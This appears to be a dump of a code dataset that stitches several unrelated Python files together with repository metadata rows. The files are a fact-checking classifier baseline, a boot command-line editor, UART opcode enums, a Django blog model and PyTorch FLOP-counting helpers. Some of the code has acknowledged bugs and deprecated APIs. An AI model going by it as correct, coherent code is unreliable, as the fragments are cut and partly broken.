    def heating(self, value):
        self._write_boolean(HEATER, value)
    @property
    def stirring(self):
        # Refresh the cached stirrer state; on IOError fall back to the cache.
        try:
            self._stirring = self._read_boolean(STIRRER)
        except IOError as exception:
            self.app.logger.warning("stirring: {}".format(str(exception)))
        return self._stirring
    @stirring.setter
    def stirring(self, value):
        self._write_boolean(STIRRER, value)
| 3,605 | 551 | 23 |
0a0c322c09dddecb6ae9edbae2255b2eba9732ab | 9,279 | py | Python | 5_fact_checking_models/baseline.py | olibchr/factChecker | 6affa8636884e1198eff8a9e360ad376f511e37d | [
"MIT"
] | 1 | 2018-06-23T20:40:41.000Z | 2018-06-23T20:40:41.000Z | 5_fact_checking_models/baseline.py | olibchr/factChecker | 6affa8636884e1198eff8a9e360ad376f511e37d | [
"MIT"
] | 1 | 2021-12-13T19:47:10.000Z | 2021-12-13T19:47:10.000Z | 5_fact_checking_models/baseline.py | olibchr/factChecker | 6affa8636884e1198eff8a9e360ad376f511e37d | [
"MIT"
] | null | null | null | import glob, os, sys, json, datetime
import pandas as pd
import numpy as np
sys.path.insert(0, os.path.dirname(__file__) + '../2_helpers')
import re, nltk
from dateutil import parser
from Fact import Fact
from User import User
from Transaction import Transaction
from decoder import decoder
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn import metrics
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import RidgeClassifier
from matplotlib import pyplot as plt
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import Imputer
import warnings
import scipy.stats
from collections import Counter
warnings.filterwarnings("ignore", category=DeprecationWarning)
SERVER_RUN = True
DIR = os.path.dirname(__file__) + '../../3_Data/'
if __name__ == "__main__":
main()
| 40.519651 | 132 | 0.682186 | import glob, os, sys, json, datetime
import pandas as pd
import numpy as np
sys.path.insert(0, os.path.dirname(__file__) + '../2_helpers')
import re, nltk
from dateutil import parser
from Fact import Fact
from User import User
from Transaction import Transaction
from decoder import decoder
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn import metrics
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import RidgeClassifier
from matplotlib import pyplot as plt
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import Imputer
import warnings
import scipy.stats
from collections import Counter
warnings.filterwarnings("ignore", category=DeprecationWarning)
SERVER_RUN = True
DIR = os.path.dirname(__file__) + '../../3_Data/'
def datetime_converter(o):
    """``json.dumps`` ``default`` hook: serialize datetime objects via str().

    Returns None for unsupported types, letting ``json`` raise its usual
    TypeError. The original compared against the ``datetime`` *module*
    (the file does ``import ... datetime``), which made ``isinstance``
    raise TypeError for every value instead of converting anything.
    """
    if isinstance(o, datetime.datetime):
        return o.__str__()
def get_data():
    """Load the facts file and the fact-transactions file from DIR.

    Returns ``(facts, transactions)``: facts decoded via the project's
    ``decoder`` hook, transactions as a pandas DataFrame. Raises IndexError
    when either file is missing (glob()[0] on an empty match).
    """
    fact_file = glob.glob(DIR + 'facts.json')[0]
    transactions_file = glob.glob(DIR + 'factTransaction.json')[0]
    # NOTE(review): the open() handle here is never explicitly closed.
    facts = json.load(open(fact_file), object_hook=decoder)
    transactions = pd.read_json(transactions_file)
    return facts, transactions
def get_users():
    """Yield ``User`` objects parsed from the per-user tweet dumps in DIR.

    Only the first line of each file is parsed (one JSON document per file).
    Sort direction depends on SERVER_RUN so two concurrent runs can walk the
    user list from opposite ends.
    """
    user_files = glob.glob(DIR + 'user_tweets/' + 'user_*.json')
    print('Found {} users'.format(len(user_files)))
    # Ascending on the server, descending locally (same branches as before,
    # collapsed into one expression).
    user_files = sorted(user_files, reverse=not SERVER_RUN)
    if len(user_files) < 10: print('WRONG DIR?')
    for user_file in user_files:
        # Context manager closes each handle; the original leaked one file
        # descriptor per user via open(...).readline().
        with open(user_file) as user_fh:
            user = json.loads(user_fh.readline(), object_hook=decoder)
        yield user
def write_user(user):
    """Serialize one User back to its per-user JSON dump (one JSON per line).

    Datetime fields are handed to ``datetime_converter`` via json's
    ``default`` hook.
    """
    print("Writing user: {}".format(user.user_id))
    with open(DIR + 'user_tweets/' + 'user_' + str(user.user_id) + '.json', 'w') as out_file:
        out_file.write(json.dumps(user.__dict__, default=datetime_converter) + '\n')
def time_til_retweet(users, df_transactions, facts):
    """Build per-fact retweet-timing features and run a classification probe.

    For every fact, aggregates the average time-to-retweet of the users who
    interacted with it into (mean, variance, mode) features, benchmarks
    classifiers on fact veracity (0 = false, 1 = true, -1 = unknown) and
    plots how correct/incorrect classifications are distributed.

    Returns the filtered, feature-augmented transactions DataFrame.
    """
    # Build both per-user lookups in one pass: ``users`` is a generator (see
    # get_users), so iterating it twice left the second dict empty. The
    # sent-tweets dict is now keyed by user_id as well; it used to be keyed by
    # the value itself, so the uid lookups below always missed.
    avg_min_to_retweet_per_user = {}
    avg_sent_per_user = {}
    for user in users:
        if user.avg_time_to_retweet is not None:
            avg_min_to_retweet_per_user[user.user_id] = user.avg_time_to_retweet
        if user.sent_tweets_avg is not None:
            avg_sent_per_user[user.user_id] = user.sent_tweets_avg
    print(avg_sent_per_user)
    hist_all, bins = np.histogram(list(avg_min_to_retweet_per_user.values()))
    print(hist_all, bins)
    X = []
    y = []
    # Attach the per-user aggregates to each transaction; unknown users get NaN.
    df_transactions['time_til_retweet'] = df_transactions['user_id'].map(
        lambda uid: avg_min_to_retweet_per_user[uid] if uid in avg_min_to_retweet_per_user else np.nan)
    df_transactions['user_sent'] = df_transactions['user_id'].map(
        lambda uid: avg_sent_per_user[uid] if uid in avg_sent_per_user else np.nan)
    df_transactions.dropna(subset=['time_til_retweet'], inplace=True)
    #df_transactions.dropna(subset=['user_sent'], inplace=True)
    df_grouped_transactions = df_transactions.groupby(['fact'])
    for tr_group in df_grouped_transactions:
        df_tr_g = tr_group[1]
        indices = ~np.isnan(df_tr_g['time_til_retweet'])
        time_til_retweet_avg = np.average(df_tr_g['time_til_retweet'][indices])
        time_til_retweet_var = np.var(df_tr_g['time_til_retweet'][indices])
        time_til_retweet_mode = np.asarray(scipy.stats.mode(df_tr_g['time_til_retweet'][indices]))[0][0]
        fact = [fact for fact in facts if fact.hash == tr_group[0]][0]
        # Exactly one label per feature row. The original appended a stray -1
        # after every 0/1 label, leaving y twice as long as X and breaking
        # train_test_split; -1 is now the "unknown veracity" class, matching
        # the *_unk groups evaluated below.
        if fact.true == '0' or fact.true == 0:
            y.append(0)
        elif fact.true == '1' or fact.true == 1:
            y.append(1)
        else:
            y.append(-1)
        X.append(np.asarray([time_til_retweet_avg, time_til_retweet_var, time_til_retweet_mode]))
    classifier = evaluation(X, y)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
    clf = Perceptron(n_iter=50)
    clf.fit(X_train, y_train)
    pred = clf.predict(X_test)
    match = [1 if t == p else 0 for t, p in zip(y_test, pred)]
    score = metrics.accuracy_score(y_test, pred)
    print(score)
    print(len(X), len(X_train), len(X_test))
    # Partition the test rows by (correctly classified?, true label).
    corclassified_group_pos = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 1 and y == 1])
    corclassified_group_neg = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 1 and y == 0])
    corclassified_group_unk = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 1 and y == -1])
    misclassified_group_pos = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 0 and y == 1])
    misclassified_group_neg = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 0 and y == 0])
    misclassified_group_unk = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 0 and y == -1])
    corclass_pos_avg = corclassified_group_pos.mean(0)
    corclass_neg_avg = corclassified_group_neg.mean(0)
    corclass_unk_avg = corclassified_group_unk.mean(0)
    misclass_pos_avg = misclassified_group_pos.mean(0)
    misclass_neg_avg = misclassified_group_neg.mean(0)
    misclass_unk_avg = misclassified_group_unk.mean(0)
    print(corclassified_group_pos)
    print(corclassified_group_neg)
    print(corclassified_group_unk)
    print(misclassified_group_pos)
    print(misclassified_group_neg)
    print(misclassified_group_unk)
    # NOTE(review): the averaged feature vectors have length 3 (avg/var/mode)
    # while bins[:-1] has the histogram's bin count; bar() requires matching
    # lengths, so this plotting section looks like a leftover from an earlier
    # histogram-based feature set — confirm before relying on it.
    fig, axes = plt.subplots(2, 3)
    axes[0, 0].bar(bins[:-1], corclass_pos_avg, width=np.diff(bins), ec="k", align="edge")
    axes[0, 0].set_title('Correct classified where fact was true')
    axes[0, 1].bar(bins[:-1], corclass_neg_avg, width=np.diff(bins), ec="k", align="edge")
    axes[0, 1].set_title('Correct classified where fact was false')
    axes[0, 2].bar(bins[:-1], corclass_unk_avg, width=np.diff(bins), ec="k", align="edge")
    axes[0, 2].set_title('Correct classified where fact was unknown')
    axes[1, 0].bar(bins[:-1], misclass_pos_avg, width=np.diff(bins), ec="r", align="edge")
    axes[1, 0].set_title('Incorrect classified where fact was true')
    axes[1, 1].bar(bins[:-1], misclass_neg_avg, width=np.diff(bins), ec="r", align="edge")
    axes[1, 1].set_title('Incorrect classified where fact was false')
    axes[1, 2].bar(bins[:-1], misclass_unk_avg, width=np.diff(bins), ec="r", align="edge")
    axes[1, 2].set_title('Incorrect classified where fact was unknown')
    #plt.show()
    return df_transactions
def evaluation(X, y):
    """Benchmark a set of sklearn classifiers on (X, y) and return the best.

    Splits the data 80/20, mean-imputes missing values on both splits, and
    cross-validates each classifier on the held-out split. Returns the
    winning ``[score, clf]`` pair — note this is a two-element list, not the
    bare classifier.
    """
    def benchmark(clf):
        # Fit on the imputed training split, then report 5-fold CV accuracy
        # on the imputed test split. Closes over X_train_imp/X_test_imp/
        # y_train/y_test, which are bound below before the first call.
        clf.fit(X_train_imp, y_train)
        pred = clf.predict(X_test_imp)
        scores = cross_val_score(clf, X_test_imp, y_test, cv=5)
        score = metrics.accuracy_score(y_test, pred)
        print("Cross validated Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
        return scores.mean()
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
    # Replace NaNs with per-column means learned from the training split only.
    imp = Imputer(missing_values='NaN', strategy='mean', axis=0)
    imp = imp.fit(X_train)
    X_train_imp = imp.transform(X_train)
    X_test_imp = imp.transform(X_test)
    results = []
    for clf, name in (
            (RidgeClassifier(tol=1e-2, solver="lsqr"), "Ridge Classifier"),
            (Perceptron(n_iter=50), "Perceptron"),
            (PassiveAggressiveClassifier(n_iter=50), "Passive-Aggressive"),
            (KNeighborsClassifier(n_neighbors=10), "kNN"),
            (RandomForestClassifier(n_estimators=100), "Random forest"),
            (MultinomialNB(alpha=.01), "Multinomial NB"),
            (BernoulliNB(alpha=.01), "Bernoulli NB")):
        print('=' * 80)
        print(name)
        results.append([benchmark(clf), clf])
    # Linear models with explicit L1/L2 regularization penalties.
    for penalty in ["l2", "l1"]:
        print("%s penalty" % penalty.upper())
        for clf, name in (
                (LinearSVC(penalty=penalty, dual=False, tol=1e-3), "Linear SVM"),
                (SGDClassifier(alpha=.0001, n_iter=50, penalty=penalty), "SGDC")):
            print('=' * 80)
            results.append([benchmark(clf), clf])
    # argmax over the score column of the [score, clf] rows.
    return results[np.argmax(np.asarray(results)[:, 0])]
def main():
    """Entry point: load facts/transactions/users, run the timing baseline."""
    facts, df_transactions = get_data()
    users = get_users()
    # feature: histogram of avg time of retweet per user. Each user is one count in the histogram. Each rumor has one histogram.
    # Prediction with this feature: ~.6 acc, high variance
    df_transactions = time_til_retweet(users, df_transactions, facts)
if __name__ == "__main__":
main()
| 7,967 | 0 | 161 |
60a87abbd5f60963f9b1b9f17741e1be53d9ef5b | 2,842 | py | Python | pibootcmdline/edit.py | urbas/pibootcmdline | dcfbc6e6075f11e1aea928452acca59528902235 | [
"MIT"
] | 1 | 2017-10-24T23:19:06.000Z | 2017-10-24T23:19:06.000Z | pibootcmdline/edit.py | urbas/pibootcmdline | dcfbc6e6075f11e1aea928452acca59528902235 | [
"MIT"
] | 67 | 2017-11-15T23:20:13.000Z | 2019-03-13T14:57:59.000Z | pibootcmdline/edit.py | urbas/pibootcmdline | dcfbc6e6075f11e1aea928452acca59528902235 | [
"MIT"
] | null | null | null | from pibootcmdline.parse import parse_parameter, Parameter
def add_parameters(cmdline, *parameters):
"""
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
*parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline now also containing the added parameters.
"""
return cmdline + [parse_parameter(parameter) for parameter in parameters]
def set_parameters(cmdline, *parameters):
"""
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
*parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline with changed or added parameters.
"""
new_params = [parse_parameter(param) for param in parameters]
new_cmdline = [_set_value(to_param, new_params) for to_param in cmdline]
for new_param in new_params:
if _index_of_key(new_cmdline, new_param.key) is None:
new_cmdline.append(new_param)
return new_cmdline
def add_to_value(cmdline, *parameters):
"""
This function will append comma-separated values to already existing values of a particular parameter.
For example, if the command line already contains the parameter ``modules-load=dwc2`` and you call `
`add-list-value modules-load=g_ether`` then the resulting command line will contain ``modules-load=dwc2,g_ether``.
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline now also containing the added parameters.
"""
from_params = [parse_parameter(param) for param in parameters]
new_cmdline = [_add_to_value(to_param, from_params) for to_param in cmdline]
for from_param in from_params:
if _index_of_key(new_cmdline, from_param.key) is None:
new_cmdline.append(from_param)
return new_cmdline
| 30.55914 | 118 | 0.674525 | from pibootcmdline.parse import parse_parameter, Parameter
def add_parameters(cmdline, *parameters):
    """
    Append the parsed parameters to the command line.

    The input list is not mutated; a new list is returned. Duplicate keys are
    NOT merged — use ``set_parameters`` or ``add_to_value`` for that.

    Parameters
    ----------
    cmdline: list[Parameter]
        parsed command line to which to add parameters.
    *parameters: str
        list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.

    Returns
    -------
    list[Parameter]
        the cmdline now also containing the added parameters.
    """
    return cmdline + [parse_parameter(parameter) for parameter in parameters]
def set_parameters(cmdline, *parameters):
    """
    Replace matching parameters in the command line, appending any that are new.

    Parameters
    ----------
    cmdline: list[Parameter]
        parsed command line in which to change or add parameters.
    *parameters: str
        list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.

    Returns
    -------
    list[Parameter]
        the cmdline with changed or added parameters.
    """
    replacements = [parse_parameter(raw) for raw in parameters]
    # Swap in the replacement for every existing parameter with a matching key.
    updated = [_set_value(existing, replacements) for existing in cmdline]
    # Anything whose key was not already present is appended at the end.
    for replacement in replacements:
        if _index_of_key(updated, replacement.key) is None:
            updated.append(replacement)
    return updated
def add_to_value(cmdline, *parameters):
    """
    Append comma-separated values to the existing values of matching parameters.

    For example, if the command line already contains ``modules-load=dwc2`` and
    you pass ``modules-load=g_ether``, the result contains
    ``modules-load=dwc2,g_ether``. Parameters whose key is not present yet are
    appended as-is.

    Parameters
    ----------
    cmdline: list[Parameter]
        parsed command line to which to add parameters.
    parameters: str
        list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.

    Returns
    -------
    list[Parameter]
        the cmdline now also containing the added parameters.
    """
    additions = [parse_parameter(raw) for raw in parameters]
    # Merge values into every existing parameter with a matching key.
    merged = [_add_to_value(existing, additions) for existing in cmdline]
    # Keys that did not exist yet are appended as brand-new parameters.
    for addition in additions:
        if _index_of_key(merged, addition.key) is None:
            merged.append(addition)
    return merged
def _set_value(param, new_params):
new_param = param
for to_param in new_params:
if param.key == to_param.key:
new_param = to_param
return new_param
def _add_to_value(to_param, from_params):
new_param = to_param
for from_param in from_params:
if to_param.key == from_param.key:
new_param = Parameter(to_param.key, new_param.values + from_param.values)
return new_param
def _index_of_key(cmdline, key):
for i, param in enumerate(cmdline):
if param.key == key:
return i
return None
| 506 | 0 | 69 |
99d083833cac96b1bde1dff2f41c31a0e099602f | 2,975 | py | Python | crownstone_uart/core/uart/UartTypes.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | null | null | null | crownstone_uart/core/uart/UartTypes.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | null | null | null | crownstone_uart/core/uart/UartTypes.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | null | null | null | from enum import IntEnum | 32.692308 | 41 | 0.526387 | from enum import IntEnum
class UartMessageType(IntEnum):
    """Outer framing type of a UART packet: plain or encrypted payload."""
    UART_MESSAGE = 0
    ENCRYPTED_UART_MESSAGE = 128
class UartTxType(IntEnum):
    """Opcodes for messages transmitted over UART.

    Values below 50000 are regular protocol commands; 50000+ appear to be
    development/debug commands (ADC config, power logging) — grouping
    presumed from the numbering, not documented here.
    """
    HELLO = 0
    SESSION_NONCE = 1
    HEARTBEAT = 2
    STATUS = 3
    GET_MAC_ADDRESS = 4
    CONTROL = 10
    HUB_DATA_REPLY = 11
    # Debug / development range.
    ENABLE_ADVERTISEMENT = 50000
    ENABLE_MESH = 50001
    GET_CROWNSTONE_ID = 50002
    # ADC configuration tweaks.
    ADC_CONFIG_INC_RANGE_CURRENT = 50103
    ADC_CONFIG_DEC_RANGE_CURRENT = 50104
    ADC_CONFIG_INC_RANGE_VOLTAGE = 50105
    ADC_CONFIG_DEC_RANGE_VOLTAGE = 50106
    ADC_CONFIG_DIFFERENTIAL_CURRENT = 50108
    ADC_CONFIG_DIFFERENTIAL_VOLTAGE = 50109
    ADC_CONFIG_VOLTAGE_PIN = 50110
    # Power sampling log streams.
    POWER_LOG_CURRENT = 50200
    POWER_LOG_VOLTAGE = 50201
    POWER_LOG_FILTERED_CURRENT = 50202
    POWER_LOG_CALCULATED_POWER = 50204
    MOCK_INTERNAL_EVT = 60000
    UNKNOWN = 65535
class UartRxType(IntEnum):
    """Opcodes for messages received over UART.

    Fix: the last member line had non-Python residue fused onto it
    (``| 0 | 2,882 | 69 |`` columns from an external join), which made the
    module a syntax error; the member value itself (60001) is kept.
    """
    HELLO = 0
    SESSION_NONCE = 1
    HEARTBEAT = 2
    STATUS = 3
    MAC_ADDRESS = 4
    RESULT_PACKET = 10
    # Parsing / decryption error replies.
    ERR_REPLY_PARSING_FAILED = 9900
    ERR_REPLY_STATUS = 9901
    ERR_REPLY_SESSION_NONCE_MISSING = 9902
    ERR_REPLY_DECRYPTION_FAILED = 9903
    UART_MESSAGE = 10000
    SESSION_NONCE_MISSING = 10001
    OWN_SERVICE_DATA = 10002
    PRESENCE_CHANGE = 10004
    FACTORY_RESET = 10005
    BOOTED = 10006
    HUB_DATA = 10007
    # Mesh-related messages.
    MESH_SERVICE_DATA = 10102
    EXTERNAL_STATE_PART_0 = 10103
    EXTERNAL_STATE_PART_1 = 10104
    MESH_RESULT = 10105
    MESH_ACK_ALL_RESULT = 10106
    RSSI_PING_MESSAGE = 10107
    LOG = 10200
    LOG_ARRAY = 10201
    INTERNAL_EVENT = 40000
    MESH_CMD_TIME = 40103
    MESH_PROFILE_LOCATION = 40110
    MESH_SET_BEHAVIOUR_SETTINGS = 40111
    MESH_TRACKED_DEVICE_REGISTER = 40112
    MESH_TRACKED_DEVICE_TOKEN = 40113
    MESH_SYNC_REQUEST = 40114
    MESH_TRACKED_DEVICE_HEARTBEAT = 40120
    # Debug / development range.
    ADVERTISING_ENABLED = 50000
    MESH_ENABLED = 50001
    CROWNSTONE_ID = 50002
    ADC_CONFIG = 50100
    ADC_RESTART = 50101
    POWER_LOG_CURRENT = 50200
    POWER_LOG_VOLTAGE = 50201
    POWER_LOG_FILTERED_CURRENT = 50202
    POWER_LOG_FILTERED_VOLTAGE = 50203
    POWER_LOG_POWER = 50204
    ASCII_LOG = 60000
    FIRMWARESTATE = 60001
23850c7a34a4aab5658c4264bf067ad13c196feb | 2,270 | py | Python | tumblog/models/post.py | lygaret-attic/django-tumblog | 46ad86d7daf7ca7468d7bd554407479e449207a9 | [
"BSD-3-Clause"
] | 1 | 2021-01-08T19:07:29.000Z | 2021-01-08T19:07:29.000Z | tumblog/models/post.py | lygaret-attic/django-tumblog | 46ad86d7daf7ca7468d7bd554407479e449207a9 | [
"BSD-3-Clause"
] | null | null | null | tumblog/models/post.py | lygaret-attic/django-tumblog | 46ad86d7daf7ca7468d7bd554407479e449207a9 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from django.db.models import permalink
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from datetime import datetime
from tagging.models import Tag
from tagging.fields import TagField
from autofields.fields import AutoSlugField
from tumblog.managers import PublishedPostManager
from tumblog.models import Blog
class Post(models.Model):
    """Tumblog Post model: a blog entry with tagging and publication state.

    Fix: two stacked bare ``@property`` decorators (left over from removed
    sibling properties) were applied to ``publish``, which takes an argument
    and mutates state — making ``post.publish(...)`` raise TypeError. They
    are removed so ``publish`` is a regular method again.
    """
    title = models.CharField(max_length = 200)
    author = models.ForeignKey(User, blank=True, null=True)
    slug = AutoSlugField(prepopulate_from = 'title', unique = True)  # derived from title
    tags = TagField()
    pubtime = models.DateTimeField(null = True, blank = True)  # None => not yet published
    blog = models.ForeignKey(Blog)
    modtime = models.DateTimeField(auto_now = True)
    post_type = models.ForeignKey(ContentType)  # concrete subclass content type
    published = PublishedPostManager()  # manager limited to published posts
    objects = models.Manager()

    def publish(self, publish_time = None):
        """
        Publish is basically a wrapper for save, which adjusts the
        recorded publish time on the post. If the publish_time parameter
        is given, then the post will be "published" after that time. If
        publish_time parameter is _not_ given, the publish_time is now,
        and the item is immediately published.
        """
        if publish_time is None:
            publish_time = datetime.now()
        self.pubtime = publish_time
        self.save()
| 33.880597 | 107 | 0.65859 | from django.db import models
from django.db.models import permalink
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from datetime import datetime
from tagging.models import Tag
from tagging.fields import TagField
from autofields.fields import AutoSlugField
from tumblog.managers import PublishedPostManager
from tumblog.models import Blog
class Post(models.Model):
    """Tumblog Post model: a blog entry with tagging and publication state.

    Fixes: removed a leftover ``import pdb; pdb.set_trace()`` in ``save()``
    (would halt every save in production), and called ``date()`` in
    ``__unicode__`` (the unbound ``self.pubtime.date`` formatted as a
    method repr instead of the date).
    """
    title = models.CharField(max_length = 200)
    author = models.ForeignKey(User, blank=True, null=True)
    slug = AutoSlugField(prepopulate_from = 'title', unique = True)  # derived from title
    tags = TagField()
    pubtime = models.DateTimeField(null = True, blank = True)  # None => not yet published
    blog = models.ForeignKey(Blog)
    modtime = models.DateTimeField(auto_now = True)
    post_type = models.ForeignKey(ContentType)  # concrete subclass content type
    published = PublishedPostManager()  # manager limited to published posts
    objects = models.Manager()

    class Meta:
        app_label = 'tumblog'
        ordering = ('-pubtime',)

    def __unicode__(self):
        return "%s: (published: %s)" % (self.title, self.pubtime.date() if self.pubtime else "not published")

    def save(self, *args, **kwargs):
        # On first save, record which concrete Post subclass this row is.
        if not self.pk:
            self.post_type = ContentType.objects.get_for_model(type(self))
        super(Post, self).save(*args, **kwargs)

    def get_tags(self):
        """Return the Tag objects attached to this post."""
        return Tag.objects.get_for_object(self)

    @property
    def inner_post(self):
        """The concrete subclass instance behind this base-table row."""
        return self.post_type.get_object_for_this_type(id = self.id)

    @property
    def template_name(self):
        """Template path chosen from the concrete post type's model name."""
        return "tumblog/post_%s.html" % self.post_type.model

    def publish(self, publish_time = None):
        """
        Publish is basically a wrapper for save, which adjusts the
        recorded publish time on the post. If the publish_time parameter
        is given, then the post will be "published" after that time. If
        publish_time parameter is _not_ given, the publish_time is now,
        and the item is immediately published.
        """
        if publish_time is None:
            publish_time = datetime.now()
        self.pubtime = publish_time
        self.save()
| 482 | 58 | 160 |
110b3a61385a3095d01b7a4cdffbe045d22cd55a | 3,215 | py | Python | mmcv/utils/helpers.py | manlinting/mmcv | ae9d3cc41054712ee54940d8657606afef4fc066 | [
"Apache-2.0"
] | 1 | 2019-09-25T12:26:05.000Z | 2019-09-25T12:26:05.000Z | mmcv/utils/helpers.py | manlinting/mmcv | ae9d3cc41054712ee54940d8657606afef4fc066 | [
"Apache-2.0"
] | null | null | null | mmcv/utils/helpers.py | manlinting/mmcv | ae9d3cc41054712ee54940d8657606afef4fc066 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import functools
import torch
import torch.nn as nn
| 37.383721 | 80 | 0.566096 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import functools
import torch
import torch.nn as nn
def load_parameters(model, src_state_dict):
    """Copy matching-name, matching-shape tensors from *src_state_dict* into *model*.

    *src_state_dict* may be a state dict or a string path to a checkpoint
    (loaded onto CPU). Entries missing from the source, or whose shapes
    disagree with the model's, are skipped with a warning.
    """
    logging.info('Loading Parameters...')
    if isinstance(src_state_dict, str):
        # A string is treated as a checkpoint path; map tensors onto CPU.
        src_state_dict = torch.load(
            src_state_dict, map_location=lambda storage, loc: storage)
    dst_state_dict = model.state_dict()
    for name in dst_state_dict:
        if name not in src_state_dict:
            logging.warning('{}: Ignored due to missing.'.format(name))
            continue
        if src_state_dict[name].size() != dst_state_dict[name].size():
            logging.warning('{}: Ignored due to shapes.'.format(name))
            continue
        dst_state_dict[name] = src_state_dict[name]
    model.load_state_dict(dst_state_dict)
def get_num_parameters(net):
    """Return the total number of scalar entries across *net*'s state dict.

    Fix: the original used functools.reduce over the per-tensor element
    counts, which raises TypeError on a module whose state dict is empty
    (e.g. nn.ReLU); sum() handles the empty case and returns 0.
    """
    return sum(tensor.numel() for tensor in net.state_dict().values())
def get_num_flops(net, x):
    """Estimate forward-pass operation count of *net* for single-sample input *x*.

    Registers a forward hook on every module, runs one no-grad forward pass
    (batch size must be 1), and sums the per-module counts the hooks stored
    in ``m.flops``. Modules of unrecognised types contribute nothing.
    NOTE(review): this is a heuristic estimate (bias/activation terms counted
    as coded below), not an exact hardware FLOP count.
    """
    def forward_hook(m, input, output):
        # Linear: one op per weight entry, plus bias entries.
        if type(m) == nn.Linear:
            output_size = torch.tensor(output[0].shape)  # NOTE(review): unused in this branch
            flops = m.weight.numel()
            if m.bias is not None:
                flops += m.bias.numel()
            m.flops = flops
            return
        # Convolutions (incl. transposed): weight ops scale with the
        # per-sample output size, divided by the group count.
        if type(m) in [
                nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose1d,
                nn.ConvTranspose2d, nn.ConvTranspose3d
        ]:
            output_size = torch.tensor(output[0].shape)
            flops = m.weight.numel() * output_size[1:].prod() / m.groups
            if m.bias is not None:
                flops += m.bias.numel() * output_size[1:].prod()
            m.flops = flops
            return
        # Pooling: one op per kernel element per output element.
        if type(m) in [
                nn.MaxPool1d, nn.MaxPool2d, nn.MaxPool3d, nn.AvgPool1d,
                nn.AvgPool2d, nn.AvgPool3d
        ]:
            output_size = torch.tensor(output[0].shape)
            kernel_size = m.kernel_size
            if type(kernel_size) not in (tuple, list):
                # Scalar kernel size: expand to one entry per spatial dim.
                kernel_size = [kernel_size] * (len(output_size) - 1)
            m.flops = torch.tensor(kernel_size).prod() * output_size[1:].prod()
            return
        # Element-wise activations: one op per output element.
        if type(m) in [nn.ReLU, nn.ReLU6, nn.PReLU, nn.Sigmoid]:
            output_size = torch.tensor(output[0].shape)
            m.flops = output_size.prod()
            return
        # Normalisation layers.
        # NOTE(review): `output_size.prod() * 4 if m.affine else 2` parses as
        # `(output_size.prod() * 4) if m.affine else 2`, so the non-affine
        # case is a constant 2 — confirm this is intended.
        if type(m) in [
                nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d,
                nn.InstanceNorm1d, nn.InstanceNorm2d, nn.InstanceNorm3d
        ]:
            output_size = torch.tensor(output[0].shape)
            m.flops = output_size.prod() * 4 if m.affine else 2
            return
    # The estimate assumes a single sample (batch dimension of 1).
    assert x.shape[0] == 1
    handles = list(
        map(lambda x: x.register_forward_hook(forward_hook), net.modules()))
    with torch.no_grad():
        net(x)
    # Remove the hooks so the network is left unmodified (except m.flops).
    list(map(lambda x: x.remove(), handles))
    return sum([x.flops for x in net.modules() if hasattr(x, 'flops')])
| 2,905 | 0 | 75 |
e1c0fc71aeebac769ec087623d2868867ad8deae | 3,497 | py | Python | app/checkers.py | chengyuhui/srvmon | 4d2c295f268e494d8b0e97cb63037e240b3db2ec | [
"MIT"
] | 1 | 2020-12-13T09:39:36.000Z | 2020-12-13T09:39:36.000Z | app/checkers.py | chengyuhui/srvmon | 4d2c295f268e494d8b0e97cb63037e240b3db2ec | [
"MIT"
] | null | null | null | app/checkers.py | chengyuhui/srvmon | 4d2c295f268e494d8b0e97cb63037e240b3db2ec | [
"MIT"
] | null | null | null | from app import app
import requests, sys, eventlet, socket
from datetime import datetime, timedelta
from .db import Server, Record, transaction, db
from .notify import notify_state_changed
from blinker import Namespace
def handle_active_http(server):
"""
Handler for Active HTTP checking
"""
config = server.get_config()
